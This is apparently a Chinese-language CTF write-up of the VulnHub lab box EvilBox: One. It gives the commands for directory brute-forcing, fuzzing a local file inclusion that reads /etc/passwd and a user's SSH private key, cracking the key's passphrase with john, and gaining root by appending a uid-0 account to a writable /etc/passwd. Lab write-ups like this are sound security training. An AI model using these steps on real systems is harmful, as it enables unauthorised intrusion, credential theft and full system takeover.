vulnhub刷題記錄(EVILBOX: ONE)
- 英文名稱 :EVILBOX: ONE
- 中文名稱 :邪惡盒子:一
- 釋出日期 :2021 年 8 月 16 日
- 難度 :容易
- 描述 :這適用於 VirtualBox 而不是 VMware。
- 下載地址 :
http://www.vulnhub.com/entry/empire-breakout,751/
1、主機發現(192.168.199.144)
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983931a611623b40d594277a4fe781e6dba94b1154ec7994ff629f5c448cfa39c5f18.jpg)
2、埠掃描(22、80)
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bc2f04e402ee13885b0974f10b2aec502b6997e1d02188e30a4b39160b001e586.jpg)
3、目錄發現
[19:51:35] 200 - 12B - /robots.txt [19:51:35] 301 - 319B - /secret -> http://192.168.199.144/secret/
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983937e2043e5742cf75e3fef1ee5c615716211f88c02b9aa89fb07e6e5df19e7026e.jpg)
4、尋找線索
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4ba0ee4cc1aaa8c8740102cb48f13ca18c2894cf4784f564a957f20939d2b38f44.jpg)
5、訪問,空白
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b190bb2b8d8257eae9c167d26eddb5a6735b227b320d493f40f91753f1aab4240.jpg)
6、繼續暴力破解
gobuster dir -u http://192.168.199.144/secret/ -w /usr/share/wordlists/dirb/big.txt -x .php
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b9102102a279e8ae363e8a6cc68ae4e8291fa684b87ded4fd44a9321adaf99602.jpg)
7、訪問,繼續空白
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b8f9dafd26dc038229fd927aa2410b8324463d2f0d858aeaf1c486f7e8e3ce06c.jpg)
8、暴力破解引數
ffuf -u 'http://192.168.199.144/secret/evil.php?FUZZ=../../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393ffe87c0154eeec821758fcc8ac0c78681855db973b23e88e49959a5f1852382f.jpg)
9、訪問,找到使用者名稱 mowree
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af9839372a3782974ceb2442ba1636bc9a2ba79e500c9ea8cbebfaf19b380170b19ccb2.jpg)
10、利用檔案包含,去找密碼
http://192.168.199.144/secret/evil.php?command=/home/mowree/.ssh/id_rsa
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393b66feeb345e0f6933d3213b0fad938c219615937894a48a2c9d3987b6eeb936b.jpg)
11、嘗試登入,需要密碼(被 passphrase 保護)
ssh -i id_rsa [email protected]
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393664a2666f24100fc2384610c2aa2e619dccb1a8624deb5aa47abd5894cb63eec.jpg)
12、john 暴力破解,得到密碼 unicorn
ssh2john id_rsa > password john --show password
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af9839365ff29be98c7b78fd2134df5de0ce3f8b7af16f17b41674d0e47318c4066c501.jpg)
13、再次登入
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bad0929a116376e5bed5325168a1eb8aebeaa28b9d563348edf1dfaccaa556057.jpg)
14、/etc/passwd 具有寫許可權
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983937acb7ca17821f7580864158eff8f56db28e9d0e2f61bec9f23623fc5378db120.jpg)
15、生成123基於MD5的密碼
mowree@EvilBoxOne:~$ openssl passwd -help Usage: passwd [options] Valid options are: -help Display this summary -in infile Read passwords from file -noverify Never verify when reading password from terminal -quiet No warnings -table Format output as table -reverse Switch table columns -salt val Use provided salt -stdin Read passwords from stdin -6 SHA512-based password algorithm -5 SHA256-based password algorithm -apr1 MD5-based password algorithm, Apache variant -1 MD5-based password algorithm -aixmd5 AIX MD5-based password algorithm -crypt Standard Unix password algorithm (default) -rand val Load the file(s) into the random number generator -writerand outfile Write random data to the specified file
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983935e35d95dcaf704e786924d4d8b0e84b69c2eaeb02a350b08ad6665e32817a044.jpg)
16、向passwd 寫入使用者ailx00的資訊(注意是單引號),成功拿到root的flag
echo 'ailx00:$1$Tuse491W$mmxvOkGDQHibl4DzhH3Fe1:0:0:root:/root:/bin/bash' >> /etc/passwd
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983939f739d76ec317e954dc87aaf74c92cf8670b15fdef4993eebdd25ab165576bd4.jpg)
到此,實驗完成~
「其他文章」
- vulnhub刷題記錄(hacksudo: L.P.E.)-增2
- vulnhub刷題記錄(hacksudo: L.P.E.)-增1
- ailx10的專欄電子書
- vulnhub刷題記錄(Funbox:Lunchbreaker)
- vulnhub刷題記錄(HACKABLE: II)
- vulnhub刷題記錄(Hack Me Please: 1)
- vulnhub刷題記錄(EVILBOX: ONE)
- vulnhub刷題記錄(Deathnote: 1)
- vulnhub刷題記錄(Dripping Blues: 1)
- vulnhub刷題記錄(ICA: 1)
- vulnhub刷題記錄(The Planets: Earth)
- 手機監控有什麼危害?
- SIEM和XDR下的安全分析小感悟
- 你的手機曾經被監控過嗎?
- 如何正則匹配亂碼?
- portmap 埠轉發
- socat 埠轉發
- 電腦監控是真的嗎?4個實驗一探究竟
- ufw 埠轉發
- SSH本地埠轉發